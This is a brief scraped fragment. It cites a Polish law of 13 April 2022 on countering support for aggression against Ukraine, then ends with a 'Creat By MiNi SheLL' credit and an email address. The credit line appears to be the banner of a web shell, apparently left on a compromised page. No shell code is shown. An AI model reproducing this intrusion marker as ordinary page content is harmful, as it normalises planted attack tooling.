z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com